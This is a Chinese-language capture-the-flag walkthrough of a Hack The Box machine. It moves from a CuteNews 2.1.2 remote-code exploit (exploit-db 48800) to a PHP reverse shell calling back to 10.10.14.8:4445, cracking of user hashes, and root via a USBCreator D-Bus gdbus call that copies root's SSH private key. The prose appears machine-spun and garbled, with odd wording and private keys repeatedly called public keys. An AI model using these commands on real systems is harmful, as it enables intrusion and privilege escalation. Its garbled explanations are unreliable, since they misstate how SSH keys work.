time手机微信（热烈欢迎搔扰沟通交流）：

这是我之一次玩 hackthebox，就找一个尽可能通俗一点的，取得ip先简易扫一扫

那肯定仅有80逐渐点一下一看

那时候点了一个，就发现那样的连接（原本想跑文件目录，結果走不动就没试了）

要我试了好多个单引号，跑了下 sqlmap，随后发现并沒有，就难堪，接着再点这一红色的 RSS

顺手删掉一下 rss.php 见到登陆页面

再申请注册的情况下发现Powered by CuteNews 2.1.2 ? 2002–2020 CutePHP. ，这玩意肯定有系统漏洞

关键应该是后边2个，提交不明白明白咋更改文件夹名称，就想立即试着第二个， searchsploit CuteNews 2.1.2 -m 48800下载出来发现立即把url装进去就可以，这都能够？

发这一转化成的shell，不太好用就立即找到我小本本里的php反跳shell指令

php -r '$sock=fsockopen("10.10.14.8",4445);exec("/bin/bash -i&3 2>&3");'

就四处找了好长时间，也试过 linux 核心系统漏洞，就注意到home文件目录下有两个登录名但沒有管理权限浏览

查看进程发现一下一个引人注意的物品

随后就没有了就挺下来想这web应当有一些提醒登陆密码啥的吧在web文件目录下寻找好长时间才发现这cdata文件目录下有物品

见到users.txt，平常见到他人文章内容在重要部位都发现users.txt，在看users文档发现全是base64的

一个破译看一下，发现有发生这两个客户，可是nadav的登陆密码没法在md5网址破译，就paul 破译出去 atlanta1

随后su发现没法取得成功

搜索一下，哦原先那样就可以了

python -c 'import pty; pty.spawn("/bin/sh")'

随后就要看了paul客户文件目录下的文档，cat .*/* 立即所有查询

见到有这一 ssh 的公钥

ssh 公与私密匙：能够转化成免密支付登陆，分成公钥和私钥，公钥才算是账户密码

ssh -i doc

PS：公钥文档务必只有是600，访问限制太高太低都不好，认为它是paul的公钥，想不到试了一下，nadav还可以登陆依据找他人文章内容提醒发现

发现USBCreator D-bus有一个插口系统漏洞，促使 *** 攻击可以浏览sudoer组里的客户，进而绕开sudo程序流程强加于的登陆密码安全设置。此系统漏洞容许 *** 攻击以根客户真实身份遮盖具备随意內容的随意文档，而不用出示登陆密码。这会造成 权利提高，比如，根据遮盖身影文档和为root密码设置。

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator--method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa(未受权浏览部位) /tmp/ssh(文档储放部位) true

运用 root 的公钥，取得成功登陆

小结：web层面进到，仔细观查，细心点，了解了ssh的公钥密匙难题，在取得地管理权限，关键搜集web网站的信息内容找提升。信息收集在渗入中至关重要。